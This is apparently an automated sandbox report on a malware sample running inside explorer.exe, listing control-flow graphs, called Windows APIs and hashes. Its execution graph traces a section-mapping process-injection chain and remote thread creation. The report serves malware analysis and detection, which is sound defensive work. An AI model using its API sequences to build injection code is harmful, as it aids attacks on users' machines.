      control_flow_graph 307 8753d1c-8753d33 308 8753dd3-8753dec 307->308 309 8753d39-8753d4b CreateToolhelp32Snapshot 307->309 310 8753d4d-8753d63 Process32First 309->310 311 8753dbb-8753dcd SleepEx 309->311 312 8753dae-8753db0 310->312 311->308 311->309 313 8753d65-8753d7c call 87551d8 312->313 314 8753db2-8753db5 FindCloseChangeNotification 312->314 317 8753d7e-8753d80 313->317 314->311 318 8753d94-8753d9b call 875483c 317->318 319 8753d82-8753d90 317->319 322 8753da0-8753da8 Process32Next 318->322 319->317 320 8753d92 319->320 320->322 322->312
      APIs
      • CreateToolhelp32Snapshot.KERNEL32 ref: 08753D3E
      • Process32First.KERNEL32 ref: 08753D5D
      • Process32Next.KERNEL32 ref: 08753DA8
      • FindCloseChangeNotification.KERNEL32 ref: 08753DB5
      • SleepEx.KERNEL32 ref: 08753DC0
      Memory Dump Source
      • Source File: 00000002.00000002.3447329337.0000000008751000.00000020.80000000.00040000.00000000.sdmp, Offset: 08751000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_8751000_explorer.jbxd
      Yara matches
      Similarity
      • API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSleepSnapshotToolhelp32
      • String ID:
      • API String ID: 14014868-0
      • Opcode ID: 39ba45db73bafd81c11e774f87e0f4933b4a983672c3a76259ecfbbd9f04089f
      • Instruction ID: ffb036a2c8ac557ee8da5ac5e6d5c249f66934cc7ad775dd5f7e0c4d2a4111e1
      • Opcode Fuzzy Hash: 39ba45db73bafd81c11e774f87e0f4933b4a983672c3a76259ecfbbd9f04089f
      • Instruction Fuzzy Hash: 8E21D230218A088FDB58AF24C0887AA72A2FB88356F140A3ED80FDA29DDB7494458761
      Function 02F21AF8 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 299threadmemoryCOMMON
      Download Yara Rule

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 323 2f21af8-2f21b2d 324 2f21b2f-2f21b36 323->324 325 2f21b4b-2f21b4f 324->325 326 2f21b51-2f21b5d 325->326 327 2f21b38-2f21b49 325->327 328 2f21b74-2f21b79 326->328 329 2f21b5f-2f21b65 326->329 327->325 331 2f21b7f-2f21b86 328->331 330 2f21b67-2f21b72 329->330 329->331 330->331 332 2f21b91-2f21b97 331->332 333 2f21b88-2f21b8f 331->333 332->324 334 2f21b99-2f21ba3 332->334 333->332 333->334 335 2f21bb2-2f21bca call 2f21e30 334->335 336 2f21ba5-2f21bac 334->336 337 2f21e07 335->337 341 2f21bd0-2f21bf2 call 2f21e30 335->341 336->335 336->337 339 2f21e09-2f21e27 337->339 341->337 344 2f21bf8-2f21c27 RtlCreateHeap 341->344 345 2f21c29-2f21c43 call 2f25044 344->345 345->337 349 2f21c49-2f21c61 call 2f253f4 345->349 349->345 352 2f21c63-2f21c7e call 2f21e30 349->352 352->337 355 2f21c84-2f21ca3 call 2f21e30 352->355 355->337 358 2f21ca9-2f21cc8 call 2f21e30 355->358 358->337 361 2f21cce-2f21ced call 2f21e30 358->361 361->337 364 2f21cf3-2f21d12 call 2f21e30 361->364 364->337 367 2f21d18-2f21d37 call 2f21e30 364->367 367->337 370 2f21d3d-2f21d98 call 2f24c44 * 3 367->370 370->337 377 2f21d9a-2f21da1 370->377 377->337 378 2f21da3-2f21da6 377->378 378->337 379 2f21da8-2f21df8 CreateThread * 2 378->379 381 2f21e00-2f21e05 379->381 381->339
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000002.00000002.3444065573.0000000002F21000.00000020.80000000.00040000.00000000.sdmp, Offset: 02F21000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_2f21000_explorer.jbxd
      Yara matches
      Similarity
      • API ID: Create$Thread$Heap
      • String ID: iP+
      • API String ID: 1054751041-51890417
      • Opcode ID: cf2ce30ea219674eb12de4e5a02e896239f1aaebb65970fad36a83100eea2f65
      • Instruction ID: bfd0de9bac1a75ec152ba0b9c21e269c2be86b86fec9a94ac7903e6eae8f1316
      • Opcode Fuzzy Hash: cf2ce30ea219674eb12de4e5a02e896239f1aaebb65970fad36a83100eea2f65
      • Instruction Fuzzy Hash: 4891B230A18E088FCF58EF18DC826A673E6FB95340B480179DD4ECB156DA74E545CB9A
      Function 08754A48 Relevance: 4.6, APIs: 3, Instructions: 84filetimeCOMMON
      Download Yara Rule

      Control-flow Graph

      APIs
      Memory Dump Source
      • Source File: 00000002.00000002.3447329337.0000000008751000.00000020.80000000.00040000.00000000.sdmp, Offset: 08751000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_8751000_explorer.jbxd
      Yara matches
      Similarity
      • API ID: File$AttributesCreateTime
      • String ID:
      • API String ID: 1986686026-0
      • Opcode ID: 608125a8aa1bce6175559d74748fb29477d2e5ca9ccfc86ce4b79151e6103723
      • Instruction ID: b9a1d271c2cb268d84f72bf521c1f1ff73b2f2a2d3b41d15412c41ebaa5bfea9
      • Opcode Fuzzy Hash: 608125a8aa1bce6175559d74748fb29477d2e5ca9ccfc86ce4b79151e6103723
      • Instruction Fuzzy Hash: 2F21303070CA488FDF64EF68988879EB6E2FBDC705F10456EA84EC7245DA34DA058782
      Function 087540A4 Relevance: 3.4, APIs: 2, Instructions: 447COMMON
      Download Yara Rule

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 391 87540a4-87540e5 392 87540e7-87540e9 391->392 393 87540ee-8754134 call 8755450 call 875539c call 875455c 391->393 394 87544c4-87544de 392->394 401 8754136-8754140 393->401 402 8754142-8754148 393->402 403 875414a-8754158 401->403 402->403 405 87544b6-87544c2 call 87553f4 403->405 406 875415e-8754195 403->406 405->394 411 87544ab-87544ac 406->411 412 875419b-87541c6 406->412 411->405 412->411 414 87541cc-87541e1 412->414 415 8754237-875423c 414->415 416 87541e3-87541e5 414->416 417 875423f-8754278 415->417 416->417 418 87541e7-8754203 call 8755044 416->418 422 875427e-8754284 417->422 423 8754478-8754485 417->423 424 8754205-875421c call 87550f0 418->424 425 8754221-8754235 call 8755044 418->425 428 87542a6-87542b0 422->428 429 8754286-87542a3 422->429 434 8754487-875448d call 87553f4 423->434 435 8754492-8754495 423->435 424->425 425->417 431 87542b6-87542c1 428->431 432 875435b-8754381 428->432 429->428 437 87542c3 431->437 438 87542c8-8754353 call 8755044 call 8755450 call 87554ac call 8755044 call 87544e8 call 87553f4 * 3 431->438 446 8754387-8754398 432->446 447 875445a-875446b 432->447 434->435 441 8754497-875449d call 87553f4 435->441 442 87544a2-87544a8 435->442 437->438 438->432 441->442 442->411 446->447 453 875439e-87543c9 RtlAllocateHeap 446->453 447->423 454 875446d-8754473 call 87553f4 447->454 456 87543cb-87543d5 453->456 454->423 459 87543f5-8754413 456->459 460 87543d7-87543f3 RtlReAllocateHeap 456->460 465 8754415 459->465 466 8754417-875441c 459->466 460->459 465->466 466->456 467 875441e-8754429 466->467 468 875442b-8754431 call 8755490 467->468 469 875444a-8754452 467->469 473 8754436-8754440 468->473 469->447 473->469
      Memory Dump Source
      • Source File: 00000002.00000002.3447329337.0000000008751000.00000020.80000000.00040000.00000000.sdmp, Offset: 08751000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_8751000_explorer.jbxd
      Yara matches
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 2a8d4c325c00e7065d788230daaf221fb62076a87581a91d4545f0ee69f183fa
      • Instruction ID: 7b06944b59648bff5f3f61beae3674d26a678bddebaa1dfacd68b8fd194eb120
      • Opcode Fuzzy Hash: 2a8d4c325c00e7065d788230daaf221fb62076a87581a91d4545f0ee69f183fa
      • Instruction Fuzzy Hash: 9CD19330718B098FDB64EF68D4496AEB7E2FF98701F10452DE84AD3245DE74E8428B96
      Function 08754F28 Relevance: 3.1, APIs: 2, Instructions: 122registryCOMMON
      Download Yara Rule

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 479 8754f28-8754f71 call 8755044 483 8754f77 479->483 484 8754ffb-875502a call 87553f4 ObtainUserAgentString 479->484 486 8754f79-8754fbb call 8755044 RegQueryValueExA 483->486 490 8754fbd-8754fdc call 87553f4 call 8755204 486->490 491 875502b call 87553f4 486->491 495 8755030-8755035 490->495 500 8754fde-8754fef 490->500 491->495 497 8755037 495->497 498 8754ff1-8754ff2 495->498 497->486 498->484 500->498
      APIs
      • RegQueryValueExA.KERNEL32 ref: 08754FAD
      • ObtainUserAgentString.URLMON ref: 08755016
      Memory Dump Source
      • Source File: 00000002.00000002.3447329337.0000000008751000.00000020.80000000.00040000.00000000.sdmp, Offset: 08751000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_8751000_explorer.jbxd
      Yara matches
      Similarity
      • API ID: AgentObtainQueryStringUserValue
      • String ID:
      • API String ID: 4107646653-0
      • Opcode ID: 1ee60c0f534f3764a8b7c02e3106e8c1bbbc8228cd7f8668cbf5d1b2e0d7aa71
      • Instruction ID: fac86ed4e8bd2bb91b74a659a80d557605e32a2cb803d6aeeb6759a864c4a307
      • Opcode Fuzzy Hash: 1ee60c0f534f3764a8b7c02e3106e8c1bbbc8228cd7f8668cbf5d1b2e0d7aa71
      • Instruction Fuzzy Hash: FE31B631608A488FDF18EF6CD8895E977D1FB88315B00027EEC5EC7645EEB4980687E1
      Function 08751EB4 Relevance: 3.1, APIs: 2, Instructions: 121synchronizationCOMMON
      Download Yara Rule

      Control-flow Graph

      APIs
        • Part of subcall function 08754DB8: GetVolumeInformationA.KERNEL32 ref: 08754E25
      • CreateMutexExA.KERNEL32 ref: 08751F27
      • CreateFileMappingA.KERNEL32 ref: 08751FD9
      Memory Dump Source
      • Source File: 00000002.00000002.3447329337.0000000008751000.00000020.80000000.00040000.00000000.sdmp, Offset: 08751000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_8751000_explorer.jbxd
      Yara matches
      Similarity
      • API ID: Create$FileInformationMappingMutexVolume
      • String ID:
      • API String ID: 3260430491-0
      • Opcode ID: 9e9a34ea7cb298080777c61faf39ef342cf239ea35ae18d0dbcb535cd23d3ff0
      • Instruction ID: c547a6a2eb8c0173e19000af88f6da15901c60320813a12413d2ff8ef945013d
      • Opcode Fuzzy Hash: 9e9a34ea7cb298080777c61faf39ef342cf239ea35ae18d0dbcb535cd23d3ff0
      • Instruction Fuzzy Hash: BD415F30718F088FEB64EB38801C7AA76D1EB98717F504A2E885ED6289CFB49602D755
      Function 02F21EB4 Relevance: 3.1, APIs: 2, Instructions: 121synchronizationCOMMON
      Download Yara Rule

      Control-flow Graph

      APIs
        • Part of subcall function 02F24DB8: GetVolumeInformationA.KERNEL32 ref: 02F24E25
      • CreateMutexExA.KERNEL32 ref: 02F21F27
      • CreateFileMappingA.KERNEL32 ref: 02F21FD9
      Memory Dump Source
      • Source File: 00000002.00000002.3444065573.0000000002F21000.00000020.80000000.00040000.00000000.sdmp, Offset: 02F21000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_2f21000_explorer.jbxd
      Yara matches
      Similarity
      • API ID: Create$FileInformationMappingMutexVolume
      • String ID:
      • API String ID: 3260430491-0
      • Opcode ID: 9e9a34ea7cb298080777c61faf39ef342cf239ea35ae18d0dbcb535cd23d3ff0
      • Instruction ID: 5c4f15f445effe8abc1aa45ae53e830f6fc9cf25730eedf10259f930b8ce1d3e
      • Opcode Fuzzy Hash: 9e9a34ea7cb298080777c61faf39ef342cf239ea35ae18d0dbcb535cd23d3ff0
      • Instruction Fuzzy Hash: 4741D530B08F188FEB64EB3484187AF72D2EF99756F40492E855FD6244CF74960A8B81
      Function 08754B68 Relevance: 3.1, APIs: 2, Instructions: 84COMMON
      Download Yara Rule

      Control-flow Graph

      APIs
      • GetTokenInformation.KERNELBASE ref: 08754BBC
      • GetTokenInformation.KERNELBASE ref: 08754BF3
      Memory Dump Source
      • Source File: 00000002.00000002.3447329337.0000000008751000.00000020.80000000.00040000.00000000.sdmp, Offset: 08751000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_8751000_explorer.jbxd
      Yara matches
      Similarity
      • API ID: InformationToken
      • String ID:
      • API String ID: 4114910276-0
      • Opcode ID: 02c84281bba87b7899f42c3c535edb1c0a1e289461f07f6c867dc8d7767b6b06
      • Instruction ID: 9f13ded76f057174db582e201064a52d504701bf12812d23cd325431a5f62245
      • Opcode Fuzzy Hash: 02c84281bba87b7899f42c3c535edb1c0a1e289461f07f6c867dc8d7767b6b06
      • Instruction Fuzzy Hash: 9E213334608A088FC754EF28C45856AB7E2FFD9311B004A6EE49AC7364DA70E845DB41
      Function 02F24B68 Relevance: 3.1, APIs: 2, Instructions: 84COMMON
      Download Yara Rule

      Control-flow Graph

      APIs
      • GetTokenInformation.KERNELBASE ref: 02F24BBC
      • GetTokenInformation.KERNELBASE ref: 02F24BF3
      Memory Dump Source
      • Source File: 00000002.00000002.3444065573.0000000002F21000.00000020.80000000.00040000.00000000.sdmp, Offset: 02F21000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_2f21000_explorer.jbxd
      Yara matches
      Similarity
      • API ID: InformationToken
      • String ID:
      • API String ID: 4114910276-0
      • Opcode ID: 02c84281bba87b7899f42c3c535edb1c0a1e289461f07f6c867dc8d7767b6b06
      • Instruction ID: dbde98923ac5bb36f4682043a0e1f6a653f9574b0e1d10cd134064c7cda8b4e3
      • Opcode Fuzzy Hash: 02c84281bba87b7899f42c3c535edb1c0a1e289461f07f6c867dc8d7767b6b06
      • Instruction Fuzzy Hash: 0A210134608A188FC754EF28D49866AB7E2FFD9311B004A6EE59AC7264DB70EC459B81
      Function 02F23D1C Relevance: 3.1, APIs: 2, Instructions: 72processCOMMON
      Download Yara Rule

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 604 2f23d1c-2f23d33 605 2f23dd3-2f23dec 604->605 606 2f23d39-2f23d4b CreateToolhelp32Snapshot 604->606 607 2f23dbb-2f23dcd SleepEx 606->607 608 2f23d4d-2f23d63 606->608 607->605 607->606 610 2f23dae-2f23db0 608->610 611 2f23db2-2f23db3 610->611 612 2f23d65-2f23d7c call 2f251d8 610->612 611->607 615 2f23d7e-2f23d80 612->615 616 2f23d82-2f23d90 615->616 617 2f23d94-2f23d9b call 2f2483c 615->617 616->615 618 2f23d92 616->618 620 2f23da0-2f23da6 617->620 618->620 620->610
      APIs
      Memory Dump Source
      • Source File: 00000002.00000002.3444065573.0000000002F21000.00000020.80000000.00040000.00000000.sdmp, Offset: 02F21000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_2f21000_explorer.jbxd
      Yara matches
      Similarity
      • API ID: CreateSleepSnapshotToolhelp32
      • String ID:
      • API String ID: 684154974-0
      • Opcode ID: 39ba45db73bafd81c11e774f87e0f4933b4a983672c3a76259ecfbbd9f04089f
      • Instruction ID: 62e0a7a736a0b92164ef79647558614512471a9c47f75cbaa36e6e08760b15aa
      • Opcode Fuzzy Hash: 39ba45db73bafd81c11e774f87e0f4933b4a983672c3a76259ecfbbd9f04089f
      • Instruction Fuzzy Hash: 25210A30214A1C8FDB18EF64C4887AA72E2FB89355F540B7EE54FDE145DB389449C751
      Function 08753DF8 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
      Download Yara Rule
      APIs
      Memory Dump Source
      • Source File: 00000002.00000002.3447329337.0000000008751000.00000020.80000000.00040000.00000000.sdmp, Offset: 08751000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_8751000_explorer.jbxd
      Yara matches
      Similarity
      • API ID: EnumSleepWindows
      • String ID:
      • API String ID: 498413330-0
      • Opcode ID: bcd33d68b26800d53c1a0055312e6970b5242bc1254dfeb745dd1bbf27494588
      • Instruction ID: 27e2186cf2a812d0e5c85e72314b0ebbc849e80339b4b67ddea2b25a28c96213
      • Opcode Fuzzy Hash: bcd33d68b26800d53c1a0055312e6970b5242bc1254dfeb745dd1bbf27494588
      • Instruction Fuzzy Hash: D3E04F30505609CFEB68AFA5C0DCBB036A1EB18206F14017EDC0EDD2A9CB764945C730
      Function 02F23DF8 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
      Download Yara Rule

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 621 2f23df8-2f23e08 622 2f23e0a-2f23e2c EnumWindows SleepEx 621->622 623 2f23e2e-2f23e3c 621->623 622->622 622->623
      APIs
      Memory Dump Source
      • Source File: 00000002.00000002.3444065573.0000000002F21000.00000020.80000000.00040000.00000000.sdmp, Offset: 02F21000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_2f21000_explorer.jbxd
      Yara matches
      Similarity
      • API ID: EnumSleepWindows
      • String ID:
      • API String ID: 498413330-0
      • Opcode ID: bcd33d68b26800d53c1a0055312e6970b5242bc1254dfeb745dd1bbf27494588
      • Instruction ID: 2f7156017839cf04e335c01c475b469fc0d937283fe688c48a794a63c5e139b0
      • Opcode Fuzzy Hash: bcd33d68b26800d53c1a0055312e6970b5242bc1254dfeb745dd1bbf27494588
      • Instruction Fuzzy Hash: 7AE04F30904A098FEB68AFA5C0DCBB036A1EB18206F1401BADD0EDD285CB7A494DC720
      Function 02F240A4 Relevance: 1.9, APIs: 1, Instructions: 447COMMON
      Download Yara Rule
      Memory Dump Source
      • Source File: 00000002.00000002.3444065573.0000000002F21000.00000020.80000000.00040000.00000000.sdmp, Offset: 02F21000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_2f21000_explorer.jbxd
      Yara matches
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 2a8d4c325c00e7065d788230daaf221fb62076a87581a91d4545f0ee69f183fa
      • Instruction ID: 7d76533d4c43a26cc1947cd5d4f55a4922499da17e2abfdd2b2d4ed5b07d8e8b
      • Opcode Fuzzy Hash: 2a8d4c325c00e7065d788230daaf221fb62076a87581a91d4545f0ee69f183fa
      • Instruction Fuzzy Hash: A2D1B230B18B198FDB58EF68D84576EB7E2FB99740F50452EE54AC3241DF74E8068B82
      Function 02F2202C Relevance: 1.7, APIs: 1, Instructions: 172fileCOMMON
      Download Yara Rule
      APIs
      Memory Dump Source
      • Source File: 00000002.00000002.3444065573.0000000002F21000.00000020.80000000.00040000.00000000.sdmp, Offset: 02F21000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_2f21000_explorer.jbxd
      Yara matches
      Similarity
      • API ID: CreateFile
      • String ID:
      • API String ID: 823142352-0
      • Opcode ID: 7f063b496fdb5386f4a3bc3b38053528e15544823e1f82b1c44872616a46c509
      • Instruction ID: 9fe8805dc2754fcf2aa3118cc879f0f3aae556c263f6b404a63950e226ae4d6a
      • Opcode Fuzzy Hash: 7f063b496fdb5386f4a3bc3b38053528e15544823e1f82b1c44872616a46c509
      • Instruction Fuzzy Hash: 6D414020718A6C4FDB98AF6C585836D71D3EBD9751F50013D990EC7385CE789D0A8781
      Function 08753414 Relevance: 1.7, APIs: 1, Instructions: 157fileCOMMON
      Download Yara Rule
      APIs
      Memory Dump Source
      • Source File: 00000002.00000002.3447329337.0000000008751000.00000020.80000000.00040000.00000000.sdmp, Offset: 08751000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_8751000_explorer.jbxd
      Yara matches
      Similarity
      • API ID: CreateFile
      • String ID:
      • API String ID: 823142352-0
      • Opcode ID: ce663faf5a716b1ca10baa4e22fa9f7e4c3774f53785b3b9c2244f163c36e0eb
      • Instruction ID: 5d19aa62fba4f8e6259abad89df4d27d948eb50135fc4758212d52b751e5fb8c
      • Opcode Fuzzy Hash: ce663faf5a716b1ca10baa4e22fa9f7e4c3774f53785b3b9c2244f163c36e0eb
      • Instruction Fuzzy Hash: 8441A330718A0D4FD79CEA7C945937AB6C2FB89612F10062EA89FC3355DE74981347D2
      Function 02F23414 Relevance: 1.7, APIs: 1, Instructions: 157fileCOMMON
      Download Yara Rule
      APIs
      Memory Dump Source
      • Source File: 00000002.00000002.3444065573.0000000002F21000.00000020.80000000.00040000.00000000.sdmp, Offset: 02F21000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_2f21000_explorer.jbxd
      Yara matches
      Similarity
      • API ID: CreateFile
      • String ID:
      • API String ID: 823142352-0
      • Opcode ID: ce663faf5a716b1ca10baa4e22fa9f7e4c3774f53785b3b9c2244f163c36e0eb
      • Instruction ID: 80255f198ec68189e2e62dd41f7705da192ddb1f62aab0ec8329b65b13dbb17a
      • Opcode Fuzzy Hash: ce663faf5a716b1ca10baa4e22fa9f7e4c3774f53785b3b9c2244f163c36e0eb
      • Instruction Fuzzy Hash: 9741C23071CE1E4FD75CEA6C985937AB6C2FB89761F50026EA69FC3241DE289C1647C2
      Function 02F24F28 Relevance: 1.6, APIs: 1, Instructions: 122registryCOMMON
      Download Yara Rule
      APIs
      Memory Dump Source
      • Source File: 00000002.00000002.3444065573.0000000002F21000.00000020.80000000.00040000.00000000.sdmp, Offset: 02F21000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_2f21000_explorer.jbxd
      Yara matches
      Similarity
      • API ID: QueryValue
      • String ID:
      • API String ID: 3660427363-0
      • Opcode ID: 1ee60c0f534f3764a8b7c02e3106e8c1bbbc8228cd7f8668cbf5d1b2e0d7aa71
      • Instruction ID: 5acbcaf16425667662353739b59b26e728ec31631883a1d100bbb856585dcdbd
      • Opcode Fuzzy Hash: 1ee60c0f534f3764a8b7c02e3106e8c1bbbc8228cd7f8668cbf5d1b2e0d7aa71
      • Instruction Fuzzy Hash: 0031C631608A598FDB18EF68DC896E977D2FB99350B00027AE94AC7145EF74DC0A47D1
      Function 08754DB8 Relevance: 1.6, APIs: 1, Instructions: 99COMMON
      Download Yara Rule
      APIs
      • GetVolumeInformationA.KERNEL32 ref: 08754E25
      Memory Dump Source
      • Source File: 00000002.00000002.3447329337.0000000008751000.00000020.80000000.00040000.00000000.sdmp, Offset: 08751000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_8751000_explorer.jbxd
      Yara matches
      Similarity
      • API ID: InformationVolume
      • String ID:
      • API String ID: 2039140958-0
      • Opcode ID: b1dc968a53a67113d9f19c608549fb198ed32c9322c33b77876c40581a868fca
      • Instruction ID: c7725b4c8d14fd951d800ceb8dde2b8ed48763b0edda92704f9c3c55d3c8d49b
      • Opcode Fuzzy Hash: b1dc968a53a67113d9f19c608549fb198ed32c9322c33b77876c40581a868fca
      • Instruction Fuzzy Hash: 4A316730618A4C8FDB64EF28C448AAA77E1FBD8311F10466E984EC7264DE74D945CB91
      Function 02F24DB8 Relevance: 1.6, APIs: 1, Instructions: 99COMMON
      Download Yara Rule
      APIs
      • GetVolumeInformationA.KERNEL32 ref: 02F24E25
      Memory Dump Source
      • Source File: 00000002.00000002.3444065573.0000000002F21000.00000020.80000000.00040000.00000000.sdmp, Offset: 02F21000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_2f21000_explorer.jbxd
      Yara matches
      Similarity
      • API ID: InformationVolume
      • String ID:
      • API String ID: 2039140958-0
      • Opcode ID: b1dc968a53a67113d9f19c608549fb198ed32c9322c33b77876c40581a868fca
      • Instruction ID: 2e1b7213347e248d3a5f27be914c82e2705b4939bdab9a050a4ef24e92055234
      • Opcode Fuzzy Hash: b1dc968a53a67113d9f19c608549fb198ed32c9322c33b77876c40581a868fca
      • Instruction Fuzzy Hash: 19318B30618A4C8FDB64FF28C858BAA77E2FBD8311F10466E994EC7264DE30D945CB81
      Function 08751AA8 Relevance: 1.5, APIs: 1, Instructions: 37COMMON
      Download Yara Rule
      APIs
        • Part of subcall function 08751AF8: RtlCreateHeap.NTDLL ref: 08751C0F
      • SleepEx.KERNEL32(?,?,?,?,?,?,?,08751A9B), ref: 08751AC8
      Memory Dump Source
      • Source File: 00000002.00000002.3447329337.0000000008751000.00000020.80000000.00040000.00000000.sdmp, Offset: 08751000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_8751000_explorer.jbxd
      Yara matches
      Similarity
      • API ID: CreateHeapSleep
      • String ID:
      • API String ID: 221814145-0
      • Opcode ID: 9adc8d4cde1f516ddaa5c4750073014e5650bc8f10d33b0d75f43d3a0b67238f
      • Instruction ID: 632676b1599dcb8c70b530a48241a5b9715405a3cf2d6af2de784e972a80112e
      • Opcode Fuzzy Hash: 9adc8d4cde1f516ddaa5c4750073014e5650bc8f10d33b0d75f43d3a0b67238f
      • Instruction Fuzzy Hash: 3EE04F14714F084BDB95BBB8D4D872D7191EB88253F94467EAD1EC638DD9B4CC815331
      Function 02F21AA8 Relevance: 1.5, APIs: 1, Instructions: 37COMMON
      Download Yara Rule
      APIs
        • Part of subcall function 02F21AF8: RtlCreateHeap.NTDLL ref: 02F21C0F
      • SleepEx.KERNEL32(?,?,?,?,?,?,?,02F21A9B), ref: 02F21AC8
      Memory Dump Source
      • Source File: 00000002.00000002.3444065573.0000000002F21000.00000020.80000000.00040000.00000000.sdmp, Offset: 02F21000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_2f21000_explorer.jbxd
      Yara matches
      Similarity
      • API ID: CreateHeapSleep
      • String ID:
      • API String ID: 221814145-0
      • Opcode ID: 9adc8d4cde1f516ddaa5c4750073014e5650bc8f10d33b0d75f43d3a0b67238f
      • Instruction ID: c53844c2e1407def2fb34f59902f876b661472c6afaee09f05cc4081158fdb10
      • Opcode Fuzzy Hash: 9adc8d4cde1f516ddaa5c4750073014e5650bc8f10d33b0d75f43d3a0b67238f
      • Instruction Fuzzy Hash: 15E04810714F1C0BDB94BBB8D8D472F7191EB8A2D0F54157D9A1EC6186D925C8494B25

      Non-executed Functions

      Function 08752968 Relevance: .5, Instructions: 471COMMON
      Download Yara Rule
      Memory Dump Source
      • Source File: 00000002.00000002.3447329337.0000000008751000.00000020.80000000.00040000.00000000.sdmp, Offset: 08751000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_8751000_explorer.jbxd
      Yara matches
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 0fac0ba0fd63c2bd3756d508b4e923d710e7c255c2520c70d3ed946f0b978393
      • Instruction ID: 3fb6c69d212b9d07243242311dfc4e17a6db13c39d2757e782f8b817db99b2b0
      • Opcode Fuzzy Hash: 0fac0ba0fd63c2bd3756d508b4e923d710e7c255c2520c70d3ed946f0b978393
      • Instruction Fuzzy Hash: 6DD18830718F088FDB68EF6C849826E72D2FB98306F50456ED84EC3259DFB4E9468795
      Function 02F22968 Relevance: .5, Instructions: 471COMMON
      Download Yara Rule
      Memory Dump Source
      • Source File: 00000002.00000002.3444065573.0000000002F21000.00000020.80000000.00040000.00000000.sdmp, Offset: 02F21000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_2f21000_explorer.jbxd
      Yara matches
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 0fac0ba0fd63c2bd3756d508b4e923d710e7c255c2520c70d3ed946f0b978393
      • Instruction ID: bd81ef8100e8e552e60756cc436841ba97821fb015e0e68f7417ebebbba2baa8
      • Opcode Fuzzy Hash: 0fac0ba0fd63c2bd3756d508b4e923d710e7c255c2520c70d3ed946f0b978393
      • Instruction Fuzzy Hash: 57D1B630718F188FDB68EF68849826EB2D2FB99351F50052ED94FC3255DF74E90A8B85

      Execution Graph

      Execution Coverage:6.6%
      Dynamic/Decrypted Code Coverage:37.1%
      Signature Coverage:0%
      Total number of Nodes:89
      Total number of Limit Nodes:3
      execution_graph 4641 401561 4642 401570 4641->4642 4643 401608 NtDuplicateObject 4642->4643 4653 4018dd 4642->4653 4644 401625 NtCreateSection 4643->4644 4643->4653 4645 4016a5 NtCreateSection 4644->4645 4646 40164b NtMapViewOfSection 4644->4646 4648 4016d1 4645->4648 4645->4653 4646->4645 4647 40166e NtMapViewOfSection 4646->4647 4647->4645 4650 40168c 4647->4650 4649 4016db NtMapViewOfSection 4648->4649 4648->4653 4651 401702 NtMapViewOfSection 4649->4651 4649->4653 4650->4645 4652 401724 4651->4652 4651->4653 4652->4653 4654 401729 3 API calls 4652->4654 4654->4653 4537 403005 4538 40315c 4537->4538 4539 40302f 4537->4539 4539->4538 4540 4030ea RtlCreateUserThread NtTerminateProcess 4539->4540 4540->4538 4613 402e07 4616 402e1a 4613->4616 4614 402f54 4615 40193e 11 API calls 4615->4614 4616->4614 4616->4615 4629 40194a 4630 40194f 4629->4630 4631 401991 Sleep 4630->4631 4632 4019ac 4631->4632 4633 401553 10 API calls 4632->4633 4634 4019bd 4632->4634 4633->4634 4591 2ec9ac0 4592 2ec9ade 4591->4592 4593 2ec9ac5 4591->4593 4602 2eca271 4592->4602 4598 2ec9ad1 4593->4598 4599 2ec9ae0 4598->4599 4600 2ec9ad0 4599->4600 4601 2eca271 3 API calls 4599->4601 4601->4600 4608 2eca28c 4602->4608 4603 2eca295 CreateToolhelp32Snapshot 4604 2eca2b1 Module32First 4603->4604 4603->4608 4605 2eca2c0 4604->4605 4607 2ec9ae9 4604->4607 4609 2ec9f30 4605->4609 4608->4603 4608->4604 4610 2ec9f5b 4609->4610 4611 2ec9f6c VirtualAlloc 4610->4611 4612 2ec9fa4 4610->4612 4611->4612 4612->4612 4735 2c4092b GetPEB 4736 2c40972 4735->4736 4541 2c4003c 4542 2c40049 4541->4542 4554 2c40e0f SetErrorMode SetErrorMode 4542->4554 4547 2c40265 4548 2c402ce 